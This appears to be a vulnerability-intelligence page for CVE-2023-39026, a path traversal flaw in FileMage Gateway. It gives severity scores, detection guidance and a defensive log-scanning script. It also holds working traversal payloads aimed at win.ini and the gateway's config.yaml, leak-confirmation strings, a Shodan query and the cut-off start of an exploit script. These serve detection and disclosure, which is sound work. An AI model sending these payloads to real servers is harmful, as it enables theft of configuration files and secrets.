CVE-2023-39026
Published 2023-08-22
CVE-2023-39026: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a…
Priority P276 · high · 7.5 · CVSS 3.1
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 10.56% (95.2th percentile)
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
Affected: 1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| filemage | filemage | <= 1.10.8 | — |
Detection & IOCs (extracted from sources)
path: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
path: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml
- Detect exploitation attempts by matching HTTP GET requests to the /mgmnt/ path containing URL-encoded backslash traversal sequences (%5c) targeting win.ini or config.yaml
- A successful exploitation response will be HTTP 200 with Content-Type text/plain and body containing the strings 'bit app support', 'extensions', and 'fonts' (win.ini content)
- Exploitation of the config.yaml path can be confirmed by checking for the string 'tls' in the response body, indicating the FileMage gateway configuration file was leaked
- Use Shodan query title:"FileMage" to identify exposed FileMage Gateway instances for proactive detection and asset inventory
- The exploit targets Windows deployments specifically via URL-encoded backslash (%5c) traversal; Linux/non-Windows deployments use forward slashes and may not be vulnerable to this exact payload
- The Exploit-DB PoC targets Azure deployments specifically and versions strictly below 1.10.9; the NVD entry covers v.1.10.8 and before for Windows deployments
- The vulnerable management endpoint is /mgmnt/ (with an extra 'n') in the actual exploit payloads, not /mgmt/ as described in the CVE advisory — detection rules should cover both variants
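One way to apply the detection notes above to web access logs, as an added example (not from the page's sources or the vendor). It flags requests under /mgmt/ or /mgmnt/ whose decoded path contains a `..` traversal segment, and goes slightly beyond the listed payloads by also unwrapping double-encoded backslashes; the log format, source addresses and log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Assumed combined-log-style line: src ... "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
MGMT_RE = re.compile(r'^/mgmn?t/', re.I)             # /mgmt/ (advisory) and /mgmnt/ (payloads)
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # ".." segment, either separator
SENSITIVE = ("win.ini", "config.yaml")               # files named in the notes above

def decode_fully(target, rounds=3):
    """Percent-decode repeatedly so %5c, %5C and %255c all end up as a backslash."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return a finding dict for a traversal attempt, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_fully(m["target"].split("?", 1)[0])
    if not MGMT_RE.match(path) or not TRAVERSAL_RE.search(path):
        return None
    return {
        "src": m["src"],
        "method": m["method"],
        "status": int(m["status"]),
        "file": next((f for f in SENSITIVE if path.lower().endswith(f)), None),
        "served": m["status"] == "200",  # 200 means the body should be checked for a leak
    }

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, shortened traversal depth).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Dec/2023:10:00:01 +0000] "GET /mgmnt/..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '203.0.113.7 - - [04/Dec/2023:10:00:02 +0000] "GET /mgmt/..%5C..%5Cprogramdata%5Cfilemage%5Cgateway%5Cconfig.yaml HTTP/1.1" 404 0',
    '198.51.100.20 - - [04/Dec/2023:10:00:03 +0000] "GET /mgmt/login HTTP/1.1" 200 512',
    '203.0.113.9 - - [04/Dec/2023:10:00:04 +0000] "GET /mgmnt/..%255c..%255cwindows%255cwin.ini HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Findings with `served` set are the ones to prioritise, since a 200 response is where the body strings listed above would confirm a leak.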
CVSS provenance
nvd · v3.1 · 7.5 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck · 7.5 HIGH
GHSA
GHSA-6m35-6x4j-hxjg: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v
ghsa_unreviewed·2023-08-23
CVE-2023-39026 [HIGH] CWE-22 GHSA-6m35-6x4j-hxjg: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v
VulnCheck
filemage filemage Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2023·CVSS 7.5
CVE-2023-39026 [HIGH] filemage filemage Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected: filemage filemage
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-39026; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-20&host_type=src&vulnerability=cve-2023-39026; https://dashboard.shadowse
No detection rules found.
Exploit-DB
FileMage Gateway 1.10.9 - Local File Inclusion
exploitdb·2023-09-04·CVSS 7.5
CVE-2023-39026 [HIGH] FileMage Gateway 1.10.9 - Local File Inclusion
---
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html
import requests
import warnings

warnings.filterwarnings("ignore")

def worker(url):
    response = requests.get(url, verify=False, timeout=.5)
    return response

def main():
    listIP = []
    file_path = input("Enter the path to the file containing the IP addresses: ")
    with open(file_path, 'r') as file:
        ip_list = file.read().spli
Nuclei
FileMage Gateway - Directory Traversal
nuclei·CVSS 7.5
CVE-2023-39026 [HIGH] FileMage Gateway - Directory Traversal
Template:
id: CVE-2023-39026
info:
  name: FileMage Gateway - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
  impact: |
    An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided b
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html
- https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
- https://www.filemage.io/docs/updates.html#change-log